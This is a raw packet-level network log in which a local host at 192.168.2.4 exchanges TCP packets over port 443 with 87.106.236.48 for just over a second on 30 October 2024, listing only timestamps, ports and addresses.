Oct 30, 2024 19:47:15.337685108 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.337685108 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.337692022 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.338145018 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.338164091 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.338176966 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.338181973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.338219881 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.338491917 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.371340036 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.371361971 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.371748924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.371757030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.371890068 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.459945917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.459969044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.460071087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.460086107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.460313082 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.460690022 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.460707903 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.460783005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.460783005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.460789919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.461153984 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.461312056 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.461327076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.461425066 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.461431980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.461556911 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.492973089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.492995024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.493081093 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.493081093 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.493088961 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.493398905 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.540210009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.540232897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.540332079 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.540340900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.540472031 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.583329916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.583353043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.583435059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.583435059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.583442926 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.583592892 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.584448099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.584464073 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.584537029 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.584542990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.584630966 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.584630966 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.585042000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.585056067 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.585179090 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.585186005 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.585261106 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.616372108 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.616394043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.616473913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.616473913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.616482019 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.616663933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.663831949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.663855076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.664287090 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.664295912 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.664561033 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.707351923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.707375050 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.707473993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.707473993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.707483053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.707771063 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.707792997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.707819939 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.707820892 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.707827091 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.707906961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.708735943 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.708751917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.708781004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.708787918 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.708813906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.708813906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.709434032 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.746639013 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.746659994 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.746784925 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.746784925 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.746795893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.746917009 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.787256002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.787280083 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.787359953 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.787370920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.787409067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.787616014 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.830333948 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.830358982 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.830440044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.830440044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.830447912 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.830828905 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.831494093 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.831512928 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.831587076 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.831587076 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.831593990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.831962109 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.832103968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.832118988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.832405090 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.832411051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.832647085 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.869801044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.869823933 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.870421886 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.870460987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.870568037 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.870568037 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.870568037 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.870582104 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.874125004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.953614950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.953639030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.953691006 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.953699112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.953738928 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.954211950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.954230070 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.954281092 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.954288006 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.954328060 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.955084085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.955099106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.955154896 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.955162048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.955202103 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.956017971 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.956037045 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.956082106 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.956089973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.956140041 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.993732929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.993761063 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.993799925 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.993805885 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.993848085 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.034538031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.034559965 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.034609079 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.034616947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.034651995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.034665108 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.077219963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.077243090 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.077295065 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.077305079 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.077332020 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.077353954 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.078233957 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.078248024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.078306913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.078314066 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.078346014 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.078365088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.078881025 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.078896999 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.078958035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.078964949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.079003096 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.116813898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.116836071 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.116888046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.116897106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.116950035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.117333889 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.117351055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.117408037 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.117413998 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.117451906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.157752037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.157773018 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.157829046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.157856941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.157896996 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.206188917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.206212997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.206264019 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.206294060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.206310034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.206326008 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.206491947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.206511021 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.206552982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.206562996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.206583023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.206599951 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.207034111 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.207051039 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.207087040 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.207097054 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.207119942 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.207135916 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.240293980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.240317106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.240359068 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.240386963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.240401030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.240422964 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.240875006 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.240894079 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.240947008 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.240957975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.240987062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.240999937 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.281162977 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.281189919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.281239986 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.281265974 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.281281948 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.281300068 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.329368114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.329394102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.329442024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.329464912 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.329476118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.329531908 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.329998016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.330013990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.330054045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.330060959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.330094099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.330683947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.330699921 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.330734968 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.330743074 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.330760956 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.330782890 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.331357956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.331374884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.331410885 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.331418991 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.331445932 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.331464052 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.365519047 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.365552902 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.365596056 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.365612030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.365629911 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.365652084 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.366543055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.366561890 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.366599083 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.366605997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.366631985 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.366660118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.404875040 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.404898882 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.404937983 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.404947996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.404964924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.404990911 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.453514099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.453536034 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.453599930 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.453615904 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.453668118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.454457045 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.454476118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.454520941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.454526901 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.454555035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.454575062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.455389977 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.455408096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.455441952 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.455449104 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.455478907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.455491066 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.456002951 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.456021070 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.456063032 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.456069946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.456099033 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.456110001 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.489619970 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.489638090 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.489681959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.489712954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.489734888 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.489758015 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.490329981 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.490346909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.490395069 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.490401030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.490425110 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.490443945 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.576375961 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.576400995 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.576510906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.576544046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.576591969 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.577721119 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.577738047 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.577804089 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.577816010 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.577851057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.578794956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.578815937 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.578862906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.578872919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.578906059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.579310894 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.579330921 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.579384089 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.579392910 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.579426050 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.580099106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.580112934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.580164909 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.580173016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.580209017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.612871885 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.612886906 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.613110065 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.613142014 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.613188028 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.613431931 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.613445044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.613492012 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.613501072 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.613538027 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.651721954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.651741028 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.651921034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:16.651957989 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:16.652009010 CET	49731	443	192.168.2.4	87.106.236.48
